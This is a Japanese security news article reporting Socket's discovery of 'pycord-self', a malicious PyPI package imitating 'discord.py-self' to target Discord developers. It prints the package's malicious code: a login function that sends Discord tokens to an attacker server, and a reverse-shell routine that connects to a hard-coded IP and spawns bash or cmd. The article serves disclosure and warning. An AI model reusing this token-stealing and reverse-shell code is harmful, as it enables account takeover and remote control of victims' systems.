悪意のあるPyPi パッケージがDiscord 開発者を標的にする

海外のセキュリティ企業Socket は約 2,800 万回ダウンロードされている非常に人気の高い「discord.py-self」を模倣した、悪意のあるPyPi パッケージ「pycord-self」がDiscord 開発者を標的にして認証トークンを盗み、システムをリモート制御するためのバックドアを仕掛けている事を指摘しました。

正規パッケージ: 「discord.py-self」とは

Python プログラミング言語を使用して Discord ユーザーアカウントを操作するためのライブラリです。具体的には、Discord API をラップしており、ユーザーアカウントとしてボットのような動作を実現するためのツールです。

悪意のあるパッケージ「pycord-self」はこのdiscord.py-selfへ見た目と内容を偽装し、Discord 開発者を標的にしています。

正規パッケージ: 「discord.py-self」の概要ページ

• 作者: Dolfies
• リリース日: 2023年4月8日
• ダウンロード数: 2,788万回

悪意のあるパッケージpycord-selfの概要ページ

• 作者: Linkedminds（偽名）
• リリース日: 2024年6月20日
• ダウンロード数: 885回

「pycord-self」パッケージには、次のアクションを実行できる悪意のあるコードが含まれていることが判明しました。

Discordトークンの盗難

• Discord認証トークンを攻撃者のサーバー（http://radium.lol:42069/...）へ送信。
• 攻撃者がトークンを使用して被害者のアカウントへ不正アクセス可能。

async def login(self, token: str) -> None:
  requests.get(
    'http://radium.lol:42069/v2/...',
  headers={'X-Sw-Version': token}
  )

def __internal_login():
　　if platform.system() == 'Linux': 
　　　　s.connect(("45.159.223.177", 6969)) 
　　　　subprocess.Popen(["bash"], stdin=s.fileno(), stdout=s.fileno()) 
　　elif platform.system() == 'Windows': 
　　　　s.connect(("45.159.223.177", 6969)) 
　　　　subprocess.Popen(["cmd"], stdin=s.fileno(), stdout=s.fileno())

threading.Thread(target=__internal_login).start()

関連記事

PyPIの人気ライブラリ「requests」に偽装したバックドア ライブラリ「requests-darwin-lite」を確認 Hugging FaceでAIのバックドア 付き 機械学習モデルを確認 PostgreSQLで重大な脆弱性が発生(CVE-2024-10979) 偽のグーグル クロームのエラーで悪意のあるPowerShellを実行させるよう誘導 Linuxのマルウェア「DISGOMOJI」はDiscordの絵文字でC2サーバーを制御する Discordで40億以上のチャットと6億のユーザーを収集、追跡していると主張する「Spy.pet」とは Discordで53億以上のチャットと4億のユーザーを収集、追跡していると主張する「Spy.pet」が復活 Arc ブラウザのWindows版を狙う偽ダウンロードサイトが観測され マルウェア感染の恐れ AWSとGoogle CloudのCLIツールで情報漏洩の脆弱性 LeakyCLIが発生